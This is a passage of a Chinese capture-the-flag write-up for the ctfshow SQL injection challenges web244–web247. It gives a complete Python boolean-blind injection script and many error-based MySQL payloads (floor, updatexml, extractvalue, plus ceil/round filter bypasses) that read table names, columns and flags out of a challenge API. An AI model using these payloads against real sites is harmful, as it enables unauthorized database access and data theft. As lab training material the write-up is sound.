ctfshow-web入门-sql注入(web244-web247)error 报错注入

目录

1、web244

2、web245

3、web246

4、web247


1、web244

在它查询框这里随便输什么都没有回显

还是在 api 接口下传参,输入存在 id:

/api/?id=1

查询成功

输入不存在的 id:

/api/?id=0

查询失败

追加单引号后,报 sql 语法错误:

/api/?id=0'

这里的回显要么是查询成功,要么是查询失败,因此无法使用联合查询注入,很典型的布尔盲注特征,注意这里用于闭合的注释符需要使用 url 编码的形式:

题目是想考报错注入,这里我先介绍盲注。

查表名:

payload = (f"id=0'or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{j},1)='{k}',1,0)%23")

有一个名为 ctfshow_flag 的表,查列名:

payload = f"id=0'or if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flag'),{j},1)='{k}',1,0)%23"

有一列就叫 flag,直接查它的内容:

payload = f"id=0'or if(substr((select flag from ctfshow_flag),{j},1)='{k}',1,0)%23" 

拿到 flag:ctfshow{9b9276fd-3180-4d98-97d8-94ccd6ffcb4a}

当然使用时间盲注也是一回事,只是布尔盲注更准确。

附上勇师傅的完整脚本:

python 复制代码
# @author:Myon
# @time:20240911
import requests
import string

url = 'http://1857171c-8ab4-4029-8732-9982731b6f74.challenge.ctf.show/api/'
dic = string.digits+string.ascii_lowercase+'{}-_'
out = ''

for j in range(1,50):
    for k in dic:
        # payload = (f"id=0'or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{j},1)='{k}',1,0)%23") # 跑表名
        # print(payload)
        # payload = f"id=0'or if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flag'),{j},1)='{k}',1,0)%23"  # 跑列名
        payload = f"id=0'or if(substr((select flag from ctfshow_flag),{j},1)='{k}',1,0)%23"  # 跑flag
        re = requests.get(url, params=payload)
        # print(re.text)
        if "\\u67e5\\u8be2\\u6210\\u529f" in re.text: # 注意反斜杠需要转义
            out += k
            break
    print(out)

下面介绍报错注入的方法,常用的有三个函数:floor、updatexml、extractvalue

详细介绍可以参考我之前的文章:

最常见的SQL报错注入函数(floor、updatexml、extractvalue)及payload总结_报错注入payload-CSDN博客https://myon6.blog.csdn.net/article/details/135184385这里不再过多赘述,直接上 payload,为了大家了解,我将分别使用这三个函数进行数据库名、表名、列名的查询。

先用 floor 函数查数据库名:

python 复制代码
/api/?id=0'or (select 1 from (select count(*),concat(0x23,(database()),0x23,floor(rand(0)*2)) as x from information_schema.columns group by x) as y)%23

我这里的非 xpath 字符用的 0x23,因此我们的报错结果会出现在 # 之后

得到数据库名为 ctfshow_web

使用 updatexml 函数查表名:

这里非 xpath 字符我用的 0x7e,因此我们的报错结果会出现在 ~ 后面

python 复制代码
/api/?id=0'or (select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow_web')),0x7e))%23

同样得到表名 ctfshow_flag

再使用 extractvalue 函数查列名:

python 复制代码
/api/?id=0'or (select extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='ctfshow_web'and table_name='ctfshow_flag'))))%23

得到列名为 flag,那么最后就是直接查 flag 的值了,随便用哪个函数都可以:

这里我们又用回 floor

python 复制代码
/api/?id=0'or (select 1 from (select count(*),concat(0x23,(select flag from ctfshow_flag),0x23,floor(rand(0)*2)) as x from information_schema.columns group by x) as y)%23

同样拿到 flag:ctfshow{9b9276fd-3180-4d98-97d8-94ccd6ffcb4a}

只要你玩通透了想怎么来怎么来

2、web245

过滤 updatexml,用其他的即可,查表名:

python 复制代码
/api/?id=0'or (select extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database()))))%23

ctfshow_flagsa

查列名:

python 复制代码
/api/?id=0'or (select extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='ctfshow_flagsa'))))%23

flag1

查字段:

python 复制代码
/api/?id=0'or (select extractvalue(1,concat(0x7e,(select flag1 from ctfshow_flagsa))))%23

ctfshow{220da1a3-3a42-47bf-9184 只有前半段,对长度有限制。

我们换用 floor 函数:

python 复制代码
/api/?id=0'or (select 1 from (select count(*),concat(0x23,(select flag1 from ctfshow_flagsa),0x23,floor(rand(0)*2)) as x from information_schema.columns group by x) as y)%23

拿到 flag:ctfshow{220da1a3-3a42-47bf-9184-9ba44cb0ec40}

3、web246

过滤updatexml extractvalue,用 floor

查表名:

python 复制代码
/api/?id=0'or (select 1 from (select count(*),concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x23,floor(rand(0)*2)) as x from information_schema.columns group by x) as y)%23

有多行数据

用 limit 试试:

python 复制代码
/api/?id=0'or (select 1 from (select count(*),concat(0x23,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x23,floor(rand(0)*2)) as x from information_schema.columns group by x) as y)%23

修改 limit 参数,查第二个数据

python 复制代码
/api/?id=0'or (select 1 from (select count(*),concat(0x23,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x23,floor(rand(0)*2)) as x from information_schema.columns group by x) as y)%23

ctfshow_flags

查列名:

python 复制代码
/api/?id=0'or (select 1 from (select count(*),concat(0x23,(select column_name from information_schema.columns where table_schema=database() and table_name='ctfshow_flags' limit 1,1),0x23,floor(rand(0)*2)) as x from information_schema.columns group by x) as y)%23

flag2

查字段内容:

python 复制代码
/api/?id=0'or (select 1 from (select count(*),concat(0x23,(select flag2 from ctfshow_flags ),0x23,floor(rand(0)*2)) as x from information_schema.columns group by x) as y)%23

拿到 flag:ctfshow{75898391-fc6b-4d5f-9d3d-4efa1b157861}

4、web247

三个都过滤了

方法(1)使用 web244 的盲注

跑了一下是可行的,这里就不再重复演示了

方法(2)使用 round 或者 ceil 替换 floor

floor() 是向下取整,ceil() 是向上取整,round() 是四舍五入取整。

使用 ceil 函数,查表名:

python 复制代码
/api/?id=0'or (select 1 from (select count(*),concat(0x23,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x23,ceil(rand(0)*2)) as x from information_schema.columns group by x) as y)%23

ctfshow_flagsa

使用 round 函数查列名:

python 复制代码
/api/?id=0'or (select 1 from (select count(*),concat(0x23,(select column_name from information_schema.columns where table_schema=database() and table_name='ctfshow_flagsa' limit 1,1),0x23,round(rand(0)*2)) as x from information_schema.columns group by x) as y)%23

flag?

查字段:

这里直接用问号会报错,使用反引号包裹:

python 复制代码
/api/?id=0'or (select 1 from (select count(*),concat(0x23,(select `flag?` from ctfshow_flagsa),0x23,round(rand(0)*2)) as x from information_schema.columns group by x) as y)%23

拿到 flag:ctfshow{3636a2a1-2c2b-4513-8d67-efa7182ec83a}

相关推荐
茶颜悦色vv4 分钟前
蓝队知识浅谈(中)
网络·web安全·网络安全
张某布响丸辣5 分钟前
SQL中的时间类型:深入解析与应用
java·数据库·sql·mysql·oracle
大懒的猫猫虫7 分钟前
Upload-Labs-Linux1学习笔迹 (图文介绍)
学习
Xlbb.9 分钟前
安全见闻6-9
网络·安全·web安全·网络安全
牧码岛29 分钟前
Web前端之汉字排序、sort与localeCompare的介绍、编码顺序与字典顺序的区别
前端·javascript·web·web前端
ctrey_33 分钟前
2024-11-13 学习人工智能的Day26 sklearn(2)
人工智能·学习·sklearn
路遇晚风1 小时前
力扣=Mysql-3322- 英超积分榜排名 III(中等)
mysql·算法·leetcode·职场和发展
Allen zhu1 小时前
【PowerHarmony】电鸿蒙学习记录-编写helloworld!
学习·华为·harmonyos
P.H. Infinity1 小时前
【RabbitMQ】10-抽取MQ工具
数据库·分布式·rabbitmq